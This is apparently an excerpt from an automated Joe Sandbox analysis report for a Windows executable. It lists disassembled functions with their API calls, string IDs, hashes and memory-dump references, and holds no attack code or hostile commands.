                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0032DFE2
                                                                                                • Part of subcall function 0031CAA0: _wcslen.LIBCMT ref: 0031CAA6
                                                                                              • _swprintf.LIBCMT ref: 0032E016
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00362892), ref: 0032E036
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032E143
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 314528a8e3ac3e60cc00d5fc45e0945eba869a6101919f6ec2bdf4d2113e65a3
                                                                                              • Instruction ID: c80715afed92df4a78c51b89cef7f22d051e69c91e5a73d8f9af74c76e1cf60c
                                                                                              • Opcode Fuzzy Hash: 314528a8e3ac3e60cc00d5fc45e0945eba869a6101919f6ec2bdf4d2113e65a3
                                                                                              • Instruction Fuzzy Hash: 57416475900628AADF27DB65DC45FEA77BCEB04700F4180A6F909AB051EF709A84CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                                • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              • OleInitialize.OLE32(00000000), ref: 0032BD34
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0032BD6B
                                                                                              • SHGetMalloc.SHELL32(0035A460), ref: 0032BD75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3To
                                                                                              • API String ID: 3498096277-2168385784
                                                                                              • Opcode ID: 328b5b1ad6f3eb55ca601475134c2ad635d182b207a35f34e1fe67cbc0e87231
                                                                                              • Instruction ID: 078d5d6d0df2837358a4a8107f353b4f47d912f7ac8ac83a643f001bba7f632e
                                                                                              • Opcode Fuzzy Hash: 328b5b1ad6f3eb55ca601475134c2ad635d182b207a35f34e1fe67cbc0e87231
                                                                                              • Instruction Fuzzy Hash: E9F062B1D00219AFCB21AF95D8499EFFFFCEF80301F004016E405E2210D7B45645CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Control-flow Graph: [graph image omitted; legend Executed / Not Executed; entry block at 320627]
APIs
  • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
  • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
• GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00320646
• GetProcAddress.KERNEL32(0035A1F0,CryptUnprotectMemory), ref: 00320656
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2141747552-1753850145
• Opcode ID: 52835241185059a2cc2cd89223d8023681ea0799b4a840f714e2972647f05e85
• Instruction ID: 8bb9e982a03bba7ae300dc0eeaad4f6189f6b72879363e3bcf2bf45eb3270613
• Opcode Fuzzy Hash: 52835241185059a2cc2cd89223d8023681ea0799b4a840f714e2972647f05e85
• Instruction Fuzzy Hash: 69E08670804B215ED7335F74B949B42BFE4DF15700F05882DE2D59B151DAB4E4508B50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: [graph image omitted; legend Executed / Not Executed; entry block at 31ab40]
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00318243,?,00000005,?,00000011), ref: 0031ABBF
• GetLastError.KERNEL32(?,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031ABCC
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00318243,?,00000005,?), ref: 0031AC02
• GetLastError.KERNEL32(?,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031AC0A
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031AC59
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 50f36461eedadd4737330a19e05ec4ab0985169d522cd338754381791045db70
• Instruction ID: 9486339b12b42c11872ced6ebf7ca9d18169a201b3cfe9bbb1a8a858cd8bcf9f
• Opcode Fuzzy Hash: 50f36461eedadd4737330a19e05ec4ab0985169d522cd338754381791045db70
• Instruction Fuzzy Hash: CA316830549B816FE7369F24DC45BDABBE8BB09321F100B29F5A0861D1C7B1A8D4CBD2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: [graph image omitted; legend Executed / Not Executed; entry block at 32beff]
APIs
  • Part of subcall function 0032C324: GetCurrentProcess.KERNEL32(00020008,0032BF14,?,?,?,?,0032BF14,?), ref: 0032C333
  • Part of subcall function 0032C324: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0032BF14,?), ref: 0032C33A
  • Part of subcall function 0032C324: GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C354
  • Part of subcall function 0032C324: GetLastError.KERNEL32(?,?,?,?,0032BF14,?), ref: 0032C35E
  • Part of subcall function 0032C324: GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,0032BF14,?), ref: 0032C382
  • Part of subcall function 0032C324: CopySid.ADVAPI32(00000044,0032BF14,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C393
• SetEntriesInAclW.ADVAPI32(00000001,11060000,00000000,?,?,?,?), ref: 0032BF56
• InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?), ref: 0032BF65
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?), ref: 0032BF78
• CreateDirectoryW.KERNELBASE(?,0000000C,?,?,?), ref: 0032BF99
• LocalFree.KERNEL32(?,?,?,?), ref: 0032BFA7
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
• String ID:
• API String ID: 2740647886-0
• Opcode ID: f839eff8340fb6f17e31c9ba7cbd132d0653634cd6495ed8cdd2c73671a841d2
• Instruction ID: d62820035e42fc0c091c18deba4a7d177fef769c6ca440f1fcb11894203ac2c1
• Opcode Fuzzy Hash: f839eff8340fb6f17e31c9ba7cbd132d0653634cd6495ed8cdd2c73671a841d2
• Instruction Fuzzy Hash: 3121B4B5C00228EADB11CFA5ED44ADEFBBCFF45740F10406AE905E2210DB749A45DFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: [graph image omitted; legend Executed / Not Executed; entry block at 32c758]
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
• IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
• TranslateMessage.USER32(?), ref: 0032C79C
• DispatchMessageW.USER32(?), ref: 0032C7A6
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: e9c86e0e3cd4e1ce0a951f2465189349c70236ab841b02f6538cdbd74a0c1344
• Instruction ID: 0399e7e300c40b1f6d14f0bdea48325bd9da5424a845743438557886a6d0e9c1
• Opcode Fuzzy Hash: e9c86e0e3cd4e1ce0a951f2465189349c70236ab841b02f6538cdbd74a0c1344
• Instruction Fuzzy Hash: 51F0DA71D0162AAB8B35ABF6EC4CDEF7FACEE05391B408415B50AD2050E7A4D546CBF0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassNameW.USER32(?,?,00000050), ref: 0032BBD7
• SHAutoComplete.SHLWAPI(?,00000010), ref: 0032BC0E
  • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0032BBFE
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: 563764ff737bd647dd48c6ccd46afa47116bfb77ed025cf25567e80809f57741
• Instruction ID: d2e76b822df78e03187a8e0e34f5e800cfb134580014016b8c15408e1ed7e19c
• Opcode Fuzzy Hash: 563764ff737bd647dd48c6ccd46afa47116bfb77ed025cf25567e80809f57741
• Instruction Fuzzy Hash: A1F0A732A00738BBDB325665AC05F9FB76CAF46B40F450021FA44F61C0DBA4EA4185F5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00334D53,00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx), ref: 00334DAF
• GetLastError.KERNEL32(?,00334D53,00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx,00000000,?,00334CAD), ref: 00334DB9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00334DE1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: d367e67933465b1a1e88ffe0414af6edc12ccd30e7d81fd14dd6ef6f14d2ca61
• Instruction ID: e56cf37035b78491056faf846e457241b46482caec8c4a62b93071769498cc37
• Opcode Fuzzy Hash: d367e67933465b1a1e88ffe0414af6edc12ccd30e7d81fd14dd6ef6f14d2ca61
• Instruction Fuzzy Hash: 95E04F3C284204BBEF221F61EC86B593F98AB01B51F110430FA0DAC0F1DBA1B9909984
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0031A9F5
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0031AA0D
                                                                                              • GetLastError.KERNEL32 ref: 0031AA3F
                                                                                              • GetLastError.KERNEL32 ref: 0031AA5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: fdd24095daf3c524201e0abd43d157cc1cbf4fa28a7cef648b5ee9ea1c367ff2
                                                                                              • Instruction ID: fe639259797d8423fe97342ccd6555ae481a1e8f4ccb59880ca97108f24aaa6e
• Instruction Fuzzy Hash: 1E110634901A04EBCF2B5F60D9006FA37ADBF09323F114626F51685190C7749EC0CB53
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00335281,00000000,00000000,?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue), ref: 0033BF26
• GetLastError.KERNEL32(?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue,00348A00,FlsSetValue,00000000,00000364,?,0033A5E7), ref: 0033BF32
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue,00348A00,FlsSetValue,00000000), ref: 0033BF40
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: a1e2f87f9d66ae2c60693972ac0b843fe8eb20391b40543a2d3b51bd3cdb7c1a
• Instruction ID: 4743eff89ac263b4be251209957720d026b59a0a0b4c5e60f6e65be9f7d8fd9b
• Instruction Fuzzy Hash: 6E01AC366152269BC7234B69AC84B57F79CAF05B61F161620FB1AD7150DB20E800CEE0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00320627: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00320646
  • Part of subcall function 00320627: GetProcAddress.KERNEL32(0035A1F0,CryptUnprotectMemory), ref: 00320656
• GetCurrentProcessId.KERNEL32(?,00000200,?,00320697), ref: 0032072A
Strings
• CryptProtectMemory failed, xrefs: 003206E1
• CryptUnprotectMemory failed, xrefs: 00320722
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: 8d256b5bd6dab5b911c770741e4c3cb715b2bebcf4869b16a2cf193cbece9af3
• Instruction ID: 97592a307b4124cf71c69ed55b1e48f970c22fe13aa272e6c5a861ef538ba6bc
• Instruction Fuzzy Hash: 98110631900A74ABDB1B9B34AC41A6E3B68EF44764F064115FC416F2A3DA30AD958AE5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadStringW.USER32(?,?,00000200,?), ref: 0031F998
• LoadStringW.USER32(?,?,00000200), ref: 0031F9AF
Strings
Similarity
• API ID: LoadString
• String ID: p05
• API String ID: 2948472770-574964626
• Opcode ID: 641f72646a65934c8698f8d2a435450a613063379e775ea4e0d6a4e31bcd2a13
• Instruction ID: d9a21be734be5bc321b723bcd36d94a0d6f031fdb9dca9ad2eefc778add6ad78
• Instruction Fuzzy Hash: EFF07436100219BBDF165F55EC04DEB7F6EFF49392B404425FD0996130D63289A0EBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,?,?,?,?,0031E79B,00000001,?,?,?,00000000,003266C2,?,?,?), ref: 0031B22E
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,003266C2,?,?,?,?,?,00326184,?), ref: 0031B275
• WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0031E79B,00000001,?,?), ref: 0031B2A1
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: bb57019a59c9042a4a234506a0e1ad6c73b66cba400d3c63c034e3d2d1ac4d95
• Instruction ID: 9c8375d25c96f61f99b7bdda50e71b756ec58ba9b39888a22607d190eb1de37c
• Instruction Fuzzy Hash: C831F7352043059FDB0ACF10D808BEEB7A9FB89715F05091DF9915B290CB74AD8DCBA2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0031D68B: _wcslen.LIBCMT ref: 0031D691
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B569
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B59C
• GetLastError.KERNEL32(?,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B5B9
Similarity
• API ID: CreateDirectory$ErrorLast_wcslen
• String ID:
• API String ID: 2260680371-0
• Opcode ID: 258fa9f7134baa7b1dae2d76c37b7b49fd8f90f4e31621a043c4cb12a107cdd8
• Instruction ID: ca31820b05c929453e954263bbaa4f8433fb7fdfef4d0974970f2b73479813d8
• Instruction Fuzzy Hash: 0601D4352042206AEF2BAB719C45BEEB25E9F0F784F050424F902EA081DB64DAC1C7B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0033CA78
Strings
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: 76fdf839c9c10d49842a79c92deecfdbf7f8d35d07b475253131d810a84b6ae6
• Instruction ID: 696ac8cda5b1bde5dd7da58699f474ac36eaace993ab4cbaa165eade30ba97c7
• Instruction Fuzzy Hash: 984114B150428C9EDF238E68CCC5AFAFBBDEB45304F1408EDE58A96142D235AE45DF20
Uniqueness
Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0033C19D
Strings
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 7a65ce6df41e242974f5f5a0bf91f97efd78d51d88a80e65d651d69c85b480d9
• Instruction ID: 038399d144082c18ab1efe1e10c0ec531ad00022ce9598732f77c1d4865f78e0
• Instruction Fuzzy Hash: 4601D33654120DBBCF039F90DC01DEE7FA6EB08750F055515FE1829161CB729971AB80
Uniqueness
Uniqueness Score: -1.00%

APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0033B72F), ref: 0033C115
Strings
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: 39c9f900a5c5e9aa03e22ab1a06d3ac756fed4fa659741809b4046fb3d25a906
• Instruction ID: 48cb42cd7a9c29b28e210c61f2b39ef75393811c3060c9088bb2803585767f24
• Instruction Fuzzy Hash: 03F0B431A4121CBBCB079F54DC02D9E7FA5DB18750F004025FD092E161CF726910AB80
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 272fefb5999941fa3666f71f62d3d8a2d2618900bb767c62c1b05ba72840ca32
                                                                                              • Instruction ID: feeac8ecbc1f1cd1a99f7d2ce2f9f879b679594e73f75317e22c99b3d04c5841
                                                                                              • Opcode Fuzzy Hash: 272fefb5999941fa3666f71f62d3d8a2d2618900bb767c62c1b05ba72840ca32
                                                                                              • Instruction Fuzzy Hash: 81E0EC3164061C7BC6076B549C029BEBBD8CB49B10F010155FD056E250CF717D019AC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032FD6A
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3To
                                                                                              • API String ID: 1269201914-245939750
                                                                                              • Opcode ID: 395b4852727089ddb0f886cbc38508716ec9e1b7b9443bf4bbe2b1fb77338ead
                                                                                              • Instruction ID: 7f65d6a3e01b3b0f5637229647349275ce86086f4855ce6355eadf516b83271e
                                                                                              • Opcode Fuzzy Hash: 395b4852727089ddb0f886cbc38508716ec9e1b7b9443bf4bbe2b1fb77338ead
                                                                                              • Instruction Fuzzy Hash: 23B012B52685107D331B21103C13F36012CC4C0B12330C53BF001C844095841C840071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0033C97B: GetOEMCP.KERNEL32(00000000,?,?,0033CC04,?), ref: 0033C9A6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0033CC49,?,00000000), ref: 0033CE24
                                                                                              • GetCPInfo.KERNEL32(00000000,0033CC49,?,?,?,0033CC49,?,00000000), ref: 0033CE37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
